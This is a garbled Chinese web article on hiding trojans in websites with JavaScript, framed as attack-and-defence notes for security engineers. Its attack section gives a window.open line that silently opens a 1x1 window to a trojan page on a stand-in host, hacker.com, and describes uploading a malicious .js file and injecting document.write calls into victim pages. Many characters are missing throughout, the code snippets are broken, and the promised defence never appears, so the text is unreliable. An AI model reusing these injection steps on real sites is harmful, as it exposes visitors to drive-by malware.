相应
预防措施也比较多其中用CSS配合JS脚本进行预防是主流方式
可这种预防方式也存在安全隐患JS脚本也可以被用来挂马令人防不胜防我们下面要介绍反击JS挂马思路方法
JS挂马溯源当IFRAME逐渐被黑客滥用
时候有经验安全工程师也开始研究相应对策
段时间内各种阻止IFRAME挂马思路方法不断涌现其中通用性较高就是利用CSS配合JS脚本防御IFRAME挂马而黑客也发现
很多网站WebSite都会让网页
JS脚本来实现广告等诸多特效如果将木马挂在JS脚本中所有该JS脚本网页都等同于被挂上了木马对于需要肉鸡群黑客而言是劳永逸因此JS脚本挂马逐渐开始被黑客应用小百科:JS脚本是JavaScript脚本语言
简称它是种面向对象脚本语言目前广泛用于动态网页编程需要提示大家是JavaScript和Java除了语法上有些相似的处以及都能够当作网页编程语言以外两者是完全不相干而JavaScript和Jscript也区别Jscript是微软为了迎战JavaScript推出脚本语言虽然JavaScript作为给非
人员脚本语言向大众推广但是JavaScript是门具有丰富特性语言它有着和其他编程语言样复杂性实际上你必须对JS有扎实理解才能用它来编写比较复杂作为名安全工程师掌握JS脚本在工作中会有很大帮助挂马原理
点通JS脚本挂马对于黑客而言
可以说优点多得数不过来首先JS脚本在挂马时可以直接将JS代码写在网页中也可以通过注入网页让网站WebSite远程调取异地JS脚本此外JS挂马插入Web页面思路方法有几十种绝对够菜鸟们眼花缭乱无从辨别木马在何处IFRAME挂马相对于安全工程师而言
如同个穿着鲜红颜色外衣劫匪招摇而扎眼很容易被发现但是利用JS挂马就意味着这个劫匪拥有了张可以随时变换面孔而且它还能够随时更换衣服这样劫匪在安全工程师搜查时很容易蒙混过关导致木马久杀不绝JS挂马攻防实录
攻现在最多见
JS挂马思路方法有两种种是直接将JavaScript脚本代码写在网页中当访问者在浏览网页时恶意挂马脚本就会通过用户浏览器悄悄地打开网马窗口隐藏地运行这种思路方法使用
关键代码如下:window.open("http://www.hacker.com/木马.html","","toolbar=no,location=no,directories=no,status=no,menubar=no,scrollbars=no,width=1,height=1");
这种代码往往很长
很容易被安全工程师发现而且没有经验黑客也喜欢将“width”和“height=”参数设为“0”但是设置为0后可能会出现恶意代码不运行情况另外
种JS挂马方式是黑客先将挂马脚本代码“document.write(',写入Windows中写字板另存为后缀为.js脚本文件并上传到自己指定网址这时黑客只需要在受害者网站WebSite中写入:或者
document.write("
")
document.write("")
document.write("
")
就成功地将木马挂到了对方
网页中了
最新评论